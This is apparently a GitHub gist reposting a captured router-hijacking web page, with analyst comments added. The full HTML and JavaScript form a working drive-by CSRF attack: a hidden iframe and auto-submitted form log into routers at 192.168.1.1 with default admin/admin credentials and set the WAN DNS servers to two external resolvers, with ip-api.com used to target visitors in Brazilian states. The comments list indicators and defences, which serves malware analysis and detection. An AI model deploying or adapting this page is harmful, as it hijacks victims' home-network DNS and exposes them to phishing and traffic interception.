@timb-machine
Last active February 13, 2021 23:43
Router CSRF malware blob
// Taken from https://urlscan.io/result/ce20fb52-b4d9-45dd-8034-fb9eae99350e#transactions:
// Request 1 for loadtxt.php:
// Blob 2 from response decoded with base64decode.org:
<!DOCTYPE html>
<!--
  Captured sample, reproduced unchanged for analysis. The markup below is a
  drive-by page that makes the visitor's own browser submit a configuration
  change to a router admin interface at 192.168.1.1 (cross-site request forgery).
  Indicators visible in this markup: a POST to /advWAN.cgi on 192.168.1.1 and
  the resolver addresses 45.62.244.95 and 104.233.73.215 in dns1/dns2.
  Defensive reading: a router whose WAN DNS servers show either address should
  be treated as tampered with. The technique depends on the admin interface
  accepting a form POST that originates from another site; a per-session
  anti-CSRF token or an Origin/Referer check on the router side stops it.
-->
<html>
<head>
<title></title>
<!-- jQuery 3.1.1 is loaded only for the $.ajax calls in the script further down. -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
</head>
<body>
<!-- .hide gives the element zero width and height and places it at -1px/-1px, so nothing is drawn for it. -->
<style>
.hide
{
position:absolute;
top:-1px;
left:-1px;
width:0px;
height:0px;
}
</style>
<!-- Invisible frame used as the form's target: the router's response loads here and the visible page does not navigate. -->
<iframe name="frame2" class="hide"></iframe>
<!--
  Auto-submitted form (submitted from script as document.frm2, never by the user).
  All fields are hidden. vpi and vci carry no value here; the script on this
  page fills them in from the visitor's geolocated region before submitting.
  NOTE(review): field names suggest a PPP WAN connection profile ("WAN1") is
  being edited; which router models expose advWAN.cgi is not stated on the page.
-->
<form action="http://192.168.1.1/advWAN.cgi" method="POST" name="frm2" target="frame2">
<input type="hidden" name="tAction" value="editApply">
<input type="hidden" name="viewPage" value="multiWANCfg">
<input type="hidden" name="action" value="edit">
<input type="hidden" name="idx" value="0">
<input type="hidden" name="icmpReply" value="0">
<input type="hidden" name="proxyArp" value="0">
<input type="hidden" name="wanMac" value="00%3A00%3A00%3A00%3A00%3A00">
<input type="hidden" name="wanEnc" value="PPP">
<input type="hidden" name="isPpp" value="1">
<input type="hidden" name="cmode" value="2">
<input type="hidden" name="vpi">
<input type="hidden" name="vci">
<input type="hidden" name="PPP_ConnectionTrigger" value="0">
<input type="hidden" name="connState" value="1">
<input type="hidden" name="ipProtocol" value="0">
<input type="hidden" name="connName" value="WAN1">
<input type="hidden" name="connType" value="1">
<input type="hidden" name="NATEnabled" value="1">
<input type="hidden" name="addrType" value="1">
<input type="hidden" name="gateway" value="192.168.1.1">
<input type="hidden" name="pppMaxMRUSize" value="1492">
<input type="hidden" name="pppServiceName" value="">
<input type="hidden" name="pppACName" value="">
<input type="hidden" name="pppLcpInterval" value="10">
<!-- The security-relevant change: DNS is enabled and pointed at two externally hosted resolvers (network indicators for this sample). -->
<input type="hidden" name="dnsEnabled" value="1">
<input type="hidden" name="dns1" value="45.62.244.95">
<input type="hidden" name="dns2" value="104.233.73.215">
<input type="hidden" name="macAddress1" value="00">
<input type="hidden" name="macAddress2" value="00">
<input type="hidden" name="macAddress3" value="00">
<input type="hidden" name="macAddress4" value="00">
<input type="hidden" name="macAddress5" value="00">
<input type="hidden" name="macAddress6" value="00">
</form>
<script>
/**
 * Helper called from authDns() when the user agent string contains "Safari".
 *
 * Analysis note: the loop starts at i = 0 with the condition i == 1, which is
 * false on its first evaluation, so the loop body never runs. As written,
 * location.reload() is never called, counterInjDns stays 0 and the
 * document.frm2.submit() inside this function is never reached. The only
 * form submission that actually happens is the one in authDns().
 */
function sfrDns()
{
var counterInjDns = 0;
for (var i = 0; i == 1; i++)
{
location.reload();
counterInjDns = 1;
}
if (counterInjDns == 1)
{
document.frm2.submit();
}
}
/**
 * Sends a login request to the router at 192.168.1.1 and then submits the
 * hidden frm2 form, whatever the outcome of the login request.
 *
 * Analysis notes:
 * - The username and password parameters are both "YWRtaW4%3D", i.e. the
 *   URL-encoded Base64 string "YWRtaW4=", which decodes to "admin". The page
 *   therefore only gets an authenticated session on devices that still use
 *   the admin/admin credentials; changing the default password defeats this step.
 * - NOTE(review): with dataType 'jsonp' jQuery normally performs cross-domain
 *   requests through a script element as a GET, so type: 'POST' is presumably
 *   not honoured. Confirm against jQuery 3.1.1 before writing a detection
 *   that keys on the HTTP method.
 * - The form is submitted from the "complete" callback, which jQuery invokes
 *   after success, error or the 1000 ms timeout alike.
 * - Detection: a request for /login.cgi?isSubmit=1 carrying these parameter
 *   values, issued by a browser while it is displaying an external page, is a
 *   usable signal where router or proxy logs exist.
 */
function authDns()
{
$.ajax({
url: 'http://192.168.1.1/login.cgi?isSubmit=1&username=YWRtaW4%3D&password=YWRtaW4%3D',
type: 'POST',
crossDomain: true,
dataType: 'jsonp',
async: true,
timeout: 1000,
success: function(data)
{
// The login response is not inspected.
},
complete: function(data)
{
// The response is ignored here as well; only the side effect of the request matters.
// The substring "Safari" also appears in the user agent of Chrome and other
// WebKit-derived browsers, so this branch is not limited to Safari itself.
if (navigator.userAgent.indexOf("Safari") != -1)
{
sfrDns();
}
// Unconditional submission of the WAN/DNS configuration form.
document.frm2.submit();
}
});
}
// Entry point, run as soon as the script is parsed: look up the visitor's
// location through the public ip-api.com JSON endpoint and act only when the
// reported regionName is one of the Brazilian states listed below. Any other
// region matches no branch, so nothing is sent to the router.
// Each branch fills the form's vpi/vci fields with a different pair and then
// calls authDns(), which logs in and submits the form.
// NOTE(review): the VPI/VCI pairs presumably correspond to regional DSL
// provider settings; the sample itself does not say which providers.
// Detection: an external page that queries ip-api.com and then issues requests
// to 192.168.1.1 is the observable sequence for this sample.
$.ajax({
url: "http://ip-api.com/json/",
complete: function(res){
// The raw response body is parsed by hand; only the regionName field is used.
var data = JSON.parse(res.responseText);
var state = data["regionName"];
// The region is written to the browser console before any branch is taken.
console.log(state);
if (state == "Rio Grande do Sul")
{
document.frm2["vpi"].value = "1";
document.frm2["vci"].value = "32";
authDns();
}
else if (state == "Acre" || state == "Federal District" || state == "Goias" || state == "Mato Grosso do Sul" || state == "Mato Grosso" || state == "Parana" || state == "Rondonia" || state == "Santa Catarina" )
{
document.frm2["vpi"].value = "0";
document.frm2["vci"].value = "35";
authDns();
}
else if (state == "Alagoas" || state == "Bahia" || state == "Ceara" || state == "Espirito Santo" || state == "Maranhao" || state == "Minas Gerais" || state == "Para" || state == "Paraíba" || state == "Pernambuco" || state == "Rio de Janeiro" || state == "Rio Grande do Norte" || state == "Sergipe")
{
document.frm2["vpi"].value = "0";
document.frm2["vci"].value = "33";
authDns();
}
else if (state == "Sao Paulo")
{
document.frm2["vpi"].value = "8";
document.frm2["vci"].value = "35";
authDns();
}
}
});
// 2
</script>
</body>
</html>